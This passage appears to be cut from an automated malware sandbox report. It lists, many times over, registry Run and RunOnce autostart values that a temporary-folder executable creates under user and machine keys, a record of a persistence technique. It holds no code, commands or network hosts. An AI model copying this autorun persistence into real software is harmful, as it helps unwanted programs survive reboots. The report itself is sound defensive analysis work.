Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
